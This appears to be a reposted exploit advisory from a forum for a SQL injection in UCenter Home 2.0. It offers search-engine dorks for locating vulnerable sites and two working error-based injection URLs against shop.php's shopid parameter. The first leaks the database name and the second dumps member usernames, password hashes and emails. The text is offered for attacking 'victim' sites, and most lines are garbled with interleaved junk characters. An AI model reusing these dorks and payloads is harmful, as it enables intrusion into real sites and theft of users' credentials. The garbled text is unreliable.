0 O. U7 _1 T* M' I7 A__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 7 q7 \5 V2 `, q& H( s
( O8 K5 `4 Y0 X, p7 g$ K! O
" `" B9 {2 Q8 [( y/ y' o( h5 i
* p2 X% }$ C# }7 K8 q*/ Author : KnocKout
+ S0 t9 i6 X" [" d. e8 q9 `$ [* @3 H V6 C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
9 |% \9 F: r! B+ y
?2 U1 m) S# j: O5 `2 r( H*/ Contact: knockoutr@msn.com 1 z. B2 M$ `, u# [8 k) L
" A3 l1 F/ C. l1 ^; l8 n6 P( e
*/ Cyber-Warrior.org/CWKnocKout
T. a+ c4 l2 K O G* X4 W
0 n+ g) R; A& C5 D. L' n; U9 q- y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 x( S. c5 x$ W) o) B7 j" ~+ J6 \# \: @* u
Script : UCenter Home 0 l" J0 h: {4 \+ ^$ C b$ W
/ v k( @& @' Q6 u9 K: aVersion : 2.0
8 n4 ^! `' ]0 D g7 c( t( M
$ o) j% c( k, i+ d8 T4 T; k$ LScript HomePage : http://u.discuz.net/ 3 H9 a) {" N, O$ o* x, e# B
, t/ Q0 d$ |0 ___--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 1 u3 k7 Q: s+ H4 \6 |3 V
% z# ^6 d/ c1 \9 l' n. @
Dork : Powered by UCenter inurl:shop.php?ac=view
0 m2 }& L% S' e2 p2 M) g4 l
* \5 G3 D- m j+ @; uDork 2 : inurl:shop.php?ac=view&shopid=
: B( l4 T* i, z0 y# A' ^, D/ K9 s2 |7 ]- A4 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 X% a F; p4 B0 p9 @
3 ^- v5 A* a, z3 w4 p; u; QVuln file : Shop.php & z; x* u2 z* N" P0 N4 U; R& i# F
* C8 C" v k+ [6 C: `# H
value's : (?)ac=view&shopid= ) ?3 @' X7 p$ o- p' `
+ S/ X4 M' |7 SVulnerable Style : SQL Injection (MySQL Error Based) " g: v3 T" o5 b
8 \ D: T: R4 W. M
Need Metarials : Hex Conversion
+ ~$ f/ c) e& C {8 `3 a
1 {' v1 v2 _+ c8 `+ m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * c4 Q4 z8 q+ `7 L P0 ]
6 K3 f) m. n" V3 A! H; n
Your Need victim Database name. ) T# A. t2 C( r f
; d y% T1 m, v |# z
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ' G& Q" ^2 Q8 w$ \0 `. U
3 f4 s! x3 G0 Y5 ~9 l
..
( P X6 l7 N7 h% V7 e! \: k3 v8 B+ ?, z- Z& V$ l$ A& t
DB : Okey.
# d9 D0 k3 }" b1 _- N$ J: Z! m S6 [/ @" V/ M
your edit DB `[TARGET DB NAME]` 9 e T2 n! H* P2 \
$ @: V) H5 w" o" B3 m5 {
Example : 'hiwir1_ucenter' 2 z/ r) I- e. a4 w. S
/ _' E4 K$ V5 d1 X# v; p: V! f
Edit : Okey. " x P( n8 O+ y
* J; x. S. S K( v7 m
Your use Hex conversion. And edit Your SQL Injection Exploit.. , X- c4 \$ J+ E0 Y) m& W Y
1 x! U2 e( g9 o- s
* a+ h6 [" F3 ?2 p0 f* M0 |
5 U) j" w3 |( I+ h; O
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 - Q: l! t9 S8 v& B0 v8 A
|
发表于 2013-2-27 21:31:31
收藏
支持
反对